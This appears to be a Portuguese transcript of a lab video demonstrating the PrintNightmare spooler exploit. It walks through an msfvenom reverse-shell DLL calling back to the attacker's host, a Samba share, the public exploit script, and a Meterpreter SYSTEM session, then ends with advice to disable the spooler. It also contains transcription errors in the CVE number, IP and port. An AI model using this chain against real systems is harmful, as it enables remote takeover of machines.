Oi pessoal, tudo bem? Estou vindo aqui para a gente falar um pouquinho sobre o pesadelo da impressão que apareceu no começo do mês de julho, né? Ou para ser mais exato, no final do mês de junho, a Microsoft divulga o Print Nightmare, né? Como os pesquisadores apelidaram essa falha de segurança que permite a exploração de um computador Windows que esteja com o serviço de spooler de impressão habilitado. Uma vez que esse serviço de spooler de impressão esteja habilitado, você consegue injetar um código malicioso no computador da vítima que consegue elevar os privilégios daquele usuário por menos que ele tenha acesso dentro daquele sistema, ele vai conseguir transformar esse usuário em system e permitir com que você faça a execução remota de qualquer comando que desejar. Né? A Microsoft tinha detectado essa falha, né? Tinha sido avisada sobre essa falha, isso é o que a gente chama de Zero Day, no final de junho, onde ela soltou uma correção, né? Por volta do dia 20, 21 de junho, mas essa correção aparentemente não resolveu o problema. Então um novo CVE foi aberto, né? O CVE 2001-34527, onde a Microsoft nesse momento recomenda apenas que você desabilite o spooler de impressão até que a correção seja realizada, né? Até que a falha seja mitigada. Enfim, eu trouxe aqui para vocês uma prova de conceito para a gente ver como essa falha acontece. E para isso eu vou utilizar aqui o nosso VirtualBox, né? Onde eu estou com duas máquinas aqui em execução, uma máquina Windows 10 vulnerável e a máquina Kali aqui Linux para a gente poder fazer o papel do atacante. Muito bom. Vamos dar uma olhadinha primeiro na nossa máquina Windows, né? Uma máquina Windows 10, eu vou me logar aqui com o usuário da vítima, né? Então vou pôr a senha do usuário da vítima. O usuário da vítima é um usuário que tem privilégios aqui para acessar essa máquina. Normalmente, o que ocorre é que eu criei aqui um usuário, vamos dar uma olhada lá no gerenciamento de usuários dessa máquina. Vocês vão ver que tem um usuário criado chamado teste. Esse usuário aqui é um usuário com quase nenhum privilégio, né? Ele está apenas no grupo usuários da máquina. Poderia ser bem um usuário aí que a gente disponibilizaria para realmente acessar este computador com o intuito de imprimir aí algum arquivo, né? Usar a impressora conectada a esse computador, por exemplo. Então, o que acontece? A máquina está aqui, vamos dar uma olhada no serviço também, é importante saber se o serviço de spooler de impressão está habilitado, né? Porque para essa POC funcionar é necessário que o spooler esteja em funcionamento. Vamos dar uma olhadinha lá, por padrão ele vem habilitado, né? Spooler de impressão está lá em execução automática, estão vendo? Ótimo, beleza. Vou deixar aqui essa máquina e vamos lá para o nosso Kali Linux, né? Bom, gente, no Kali Linux eu fiz o seguinte. A primeira coisa foi baixar aqui do GitHub esse código que permite fazer a inserção de execução, né, arbitrária de comandos aí através da falha do spooler de impressão, que é esse exploit aqui chamado CVE 2021-1675. Tá bom? Vocês conseguem aí se procurar no GitHub e vocês vão achar para baixar esse programinha aqui feito em Python. Olha, dá até para a gente dar uma olhadinha rápida aqui no código dele. É um programinha feito, você vai precisar do Python 3 instalado. Lá no próprio GitHub tem toda a explicação de como é que você faz para instalar as bibliotecas necessárias para o Python 3. Tá bom? Que ele vai consumir. Não é um código muito grande, ele não chega a ter 200 linhas, é um código bem simples aí para fazer o trabalho de conexão. Muito bem. Aqui, gente, antes de mais nada, para que vocês entendam como é que o CVE 2021-1675 funciona, você precisa, na verdade, se conectar à máquina da vítima com credenciais simples, né? Você tem que saber as credenciais simples desse usuário. E uma vez que você se conecta, você pode executar um comando qualquer, né? Executar um arquivo qualquer.
Para isso, eu vou gerar aqui na minha pastinha teste, eu vou gerar um malware através do MSF Venom, né? Eu já deixei aqui, olha, MSF Venom -F, eu vou criar uma DLL. Essa DLL, na verdade, ofusca para a gente um shell reverso, né? O que se esconde por trás dessa DLL aqui é um reverso que, na verdade, vai me retornar em um Windows 64 bits, Meterpreter Reverse TCP. Para o IP local aqui, né, o IP do meu Kali Linux, que é o 10.0.2.15, na porta 4444. E o output aqui desse MSF Venom vai ser o arquivinho de nome malware.dll. Vou dar um Enter aqui, o MSF Venom vai criar para a gente essa DLL. Né? Vamos aguardar aqui esse processo. Uma vez que ele cria o malware, está aqui, olha, se eu der um S, está aqui na pastinha, o malware.dll. E eu vou ter que fazer com que este arquivo seja visualizado num share aqui do próprio Linux. Para isso, eu vou utilizar o Samba, né? Para quem não sabe, o Samba ele tem um arquivinho aqui que a gente faz a configuração do próprio da própria pasta onde a gente vai compartilhar as coisas no Samba, né? Ficou bem mais fácil. Antigamente instalar o Samba era... Agora, com a última versão que tem aqui no Kali 2021, você vê que basta você, a pasta que você tem aqui, você cria o caminho para ela, né? Eu criei um bloquinho aqui chamado teste, e aí você vê aqui que eu tenho o path em home Kali teste, read only no, guest ok, browser ok, yes, né? Então, compartilhar uma pasta, e é como se eu estivesse compartilhando mesmo a pasta do Linux, né? Estou compartilhando essa minha pasta, a home Kali test, que é justamente aonde está aqui o nosso malwarezinho. Muito bem. Uma vez que eu fiz isso, o que eu preciso fazer? Se vocês lembrarem, olha, o comando que eu fiz aqui do MSF Venom foi para criar um shell reverso, né? Ou seja, eu quero que quando esse malware for executado, esta DLL aqui tente se conectar na máquina Linux no 10.0.2.5 na porta 444. Ou seja, ele procura uma C2, né? Eu já deixei uma janelinha aqui para vocês verem, onde eu estou no Metaexploit. E eu já vou utilizar aqui um exploit que é o multi-handle, né? Se a gente olhar as opções aqui, eu já deixei setadinho para vocês. O lhost 10.0.2.15 e o lport 4444. Estou prontinho aqui para executar este multi-handler, né? Ou seja, deixar uma conexão em listen. Então, vou dar aqui um run -j-z e estou prontinho aqui para receber uma conexão. Bom, como eu já tenho o malware criado aqui nessa janela, né? O malware está aqui. Está na hora da gente executar esse CVE, né? Então eu já deixei aqui para a gente chamar aqui o Python 3. Eu vou dar um sudo, né? Para ele rodar como root, já que as versões novas do Kali você não está logado por padrão como root, né? Então eu vou deixar aqui sudo Python 3, o nome do script Python, que é o CVE 2021-1675, me conectando no IP aqui do Windows, né? Essa máquina Windows aqui, ela está com esse IP, vamos confirmar aqui, ipconfig, ela está com o IP 10.0.2.9, perfeito. Menorzinho aqui, para a gente lembrar. E, então tá aqui, olha, o IP 10.0.2.9, só que eu quero na conexão, se conectando com o usuário teste, sem a teste, que é aquele usuário simples lá que eu fiz. Então, olha, sudo Python 3, nome do script Python, teste 2.teste, que é usuário 2.senha, arroba 10.0.2.9, é a sintaxe desse script aqui. E entre apóstrofe, eu passo o nome do meu share, onde eu estou compartilhando a nossa DLL maliciosa, né? A malware DLL. Está aqui, olha, // 10.0.2.15 teste /malware.dll. Lembrando que isso aqui só vai funcionar se você tiver o Samba habilitado aí na sua máquina de atacante. Ok? Vou dar um Enter, ele me pede a senha aqui do meu Kali, né? A senha de root do meu Kali.
e ele vai começar a execução aqui do nosso malware. Quer dizer, ele se conectou lá na 10029, graças a essa falha do spool de impressão, e está injetando o código que é o nosso malware DLL. Pode ver aqui, olha, nessa janelinha que ele já injetou. Se eu der um sessions aqui, eu vejo que eu tenho a seção de número 5. Então, vou dar um sessions "-i 5. Ok. Se eu dar um get UID, eu vejo aqui que eu sou autoridade do sistema, apesar de ser um usuário teste, com a senha teste, era um usuário simples, né? Mas eu estou conectado lá na máquina Windows 10 com o usuário teste, só que com credenciais aqui para fazer o que eu bem entender, né? Eu posso vir aqui, então, olha, ver todos os processos. Vamos pegar um processo aqui, vamos ver o Explorer.exe, que processo que está. Ele está no PID 3776. Então, eu vou migrar para o 3776, para eu virar aqui o Explorer.exe. Vou dar um use aqui no espia, para ajudar a gente um pouco a usar comandos aqui como o screen grab. E com isso, olha só, consegui um print aqui da máquina da vítima, né? Olha só, eu estou dentro do Kali Linux, mas eu consegui visualizar aqui a máquina da vítima. Quer dizer, eu posso fazer agora o que eu bem entender nessa máquina, né? Eu tenho controle total sobre ela. Beleza? Vocês gostaram das dicas aí? Segue a gente para mais informações. E o que dá para fazer, Marcelo, para se livrar desse problema, né? Para eu não ser atacado por essa falha? Gente, enquanto a Microsoft não soltar uma correção final, estou aqui na máquina Windows, né? A única coisa que você pode fazer para resolver o problema é interromper o serviço aqui do spooler de impressão, né? Veja que, apesar de eu ter interrompido o processo, eu já estou conectado aqui, então eu não caio mais enquanto eu não reiniciar esse computador aqui, eu não vou perder a conexão, né? Mas ninguém vai mais conseguir injetar esse código aqui para invadir novamente a minha máquina. Tá bom? É isso aí, forte abraço e até a próxima.